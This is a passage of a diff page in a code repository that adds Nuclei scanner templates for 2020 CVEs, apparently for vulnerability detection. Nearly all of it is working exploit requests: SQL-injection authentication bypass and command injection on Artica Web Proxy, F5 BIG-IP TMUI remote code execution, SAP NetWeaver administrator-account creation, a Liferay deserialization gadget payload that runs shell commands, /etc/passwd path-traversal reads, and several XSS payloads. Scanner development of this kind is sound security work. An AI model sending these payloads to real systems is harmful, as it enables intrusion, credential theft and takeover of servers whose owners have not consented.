GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "array(2)"
|
||||
- "Position: ||whoami||"
|
||||
- "root"
|
||||
condition: and
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2020-17506
|
||||
|
||||
info:
|
||||
name: Artica Web Proxy 4.30 Authentication Bypass
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Artica Web Proxy 4.30.00000000
|
||||
# allows remote attacker to bypass privilege detection
|
||||
# and gain web backend administrator privileges
|
||||
# through SQL injection of the apikey parameter in fw.login.php.
|
||||
# -
|
||||
# References:
|
||||
# > https://blog.max0x4141.com/post/artica_proxy/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
|
||||
redirects: true
|
||||
max-redirects: 1
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "artica-applianc"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 301
|
||||
- 302
|
||||
condition: or
|
||||
- type: word
|
||||
name: session
|
||||
words:
|
||||
- "PHPSESSID"
|
||||
part: header
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- "PHPSESSID"
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2020-2096
|
||||
|
||||
info:
|
||||
name: Jenkins Gitlab Hook XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
part: body
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-3187
|
||||
|
||||
# Reference: https://twitter.com/aboul3la/status/1286809567989575685
|
||||
|
||||
info:
|
||||
name: CVE-2020-3187
|
||||
author: KareemSe1im
|
||||
severity: High
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/+CSCOE+/session_password.html"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- webvpn
|
||||
- Webvpn
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2020-3452
|
||||
|
||||
# Source: https://twitter.com/aboul3la/status/1286012324722155525
|
||||
|
||||
info:
|
||||
name: CVE-2020-3452
|
||||
author: pdteam
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "INTERNAL_PASSWORD_ENABLED"
|
||||
- "CONF_VIRTUAL_KEYBOARD"
|
||||
condition: and
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-5284
|
||||
|
||||
info:
|
||||
name: Next.js .next/ limited path traversal
|
||||
author: Harsh & Rahul & dwisiswant0
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '\{"/_app":".*?_app\.js"'
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2020-5405
|
||||
|
||||
info:
|
||||
name: Spring Cloud Directory Traversal
|
||||
author: Harsh Bothra
|
||||
severity: High
|
||||
|
||||
# source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-5410
|
||||
|
||||
info:
|
||||
name: Directory Traversal in Spring Cloud Config Server
|
||||
author: mavericknerd
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
||||
- "{{BaseURL}}:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2020-5902
|
||||
|
||||
info:
|
||||
name: F5 BIG-IP TMUI RCE
|
||||
author: madrobot & dwisiswant0 & ringo
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
|
||||
- "{{BaseURL}}/hsqldb%0a"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
- "BIG-IP release ([\\d.]+)"
|
||||
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
|
||||
- "HSQL Database Engine Servlet"
|
||||
condition: or
|
||||
part: body
|
||||
- raw:
|
||||
- |
|
||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
command=create%20cli%20alias%20private%20list%20command%20bash
|
||||
- |
|
||||
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
|
||||
- |
|
||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
command=list%20%2Ftmp%2Fnonexistent
|
||||
- |
|
||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
command=delete%20cli%20alias%20private%20list
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "h3ll0_w0Rld"
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2020-6287
|
||||
|
||||
info:
|
||||
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Affected Versions: 7.30, 7.31, 7.40, 7.50
|
||||
|
||||
# p.s:
|
||||
# > Don't forget to change the default credentials
|
||||
# > to create new admin in associated file:
|
||||
# > `payloads/CVE-2020-6287.xml`
|
||||
|
||||
# Ref:
|
||||
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
data: "payloads/CVE-2020-6287.xml"
|
||||
raw:
|
||||
- |
|
||||
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml; charset=UTF-8
|
||||
Connection: close
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2020-7209
|
||||
|
||||
info:
|
||||
name: LinuxKI Toolset 6.01 Remote Command Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
|
||||
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
||||
|
||||
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "nonexistent"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,60 @@
|
|||
id: CVE-2020-7961
|
||||
|
||||
info:
|
||||
name: Liferay Portal Unauthenticated RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Deserialization of Untrusted Data in
|
||||
# Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers
|
||||
# to execute arbitrary code via JSON web services (JSONWS).
|
||||
# -
|
||||
# References:
|
||||
# > https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
command:
|
||||
- "systeminfo" # Windows
|
||||
- "lsb_release -a" # Linux
|
||||
- "sysctl kern.ostype" # macOS
|
||||
port:
|
||||
- "80"
|
||||
- "443"
|
||||
- "8080"
|
||||
attack: sniper
|
||||
raw:
|
||||
- |
|
||||
POST /api/jsonws/invoke HTTP/1.1
|
||||
Host: {{Hostname}}:port
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
||||
Content-Length: 4938
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
|
||||
X-Requested-With: XMLHttpRequest
|
||||
cmd2: command
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Microsoft Corporation"
|
||||
- "Distributor ID"
|
||||
- "kern.ostype"
|
||||
condition: or
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "Microsoft Windows (.*)"
|
||||
- "kern.ostype: (.*)"
|
||||
- "Distributor ID: (.*)"
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-8091
|
||||
|
||||
info:
|
||||
name: TYPO3 Cross-Site Scripting Vulnerability
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "31337"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "application/x-shockwave-flash"
|
||||
part: header
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2020-8115
|
||||
|
||||
info:
|
||||
name: Revive Adserver XSS
|
||||
author: madrobot & dwisiswant0
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- (?mi)window\.location\.replace\(".*alert\(1337\)
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2020-8163
|
||||
|
||||
info:
|
||||
name: Potential Remote Code Execution on Rails
|
||||
author: tim_koopmans
|
||||
severity: high
|
||||
description: Tests for ability to pass user parameters as local variables into partials
|
||||
# reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2020-8191
|
||||
|
||||
info:
|
||||
name: Citrix ADC & NetScaler Gateway Reflected XSS
|
||||
# Leads to RCE
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /menu/stapp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Length: 96
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
X-NITRO-USER: xpyZxwy6
|
||||
|
||||
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</title><script>alert(31337)</script>"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue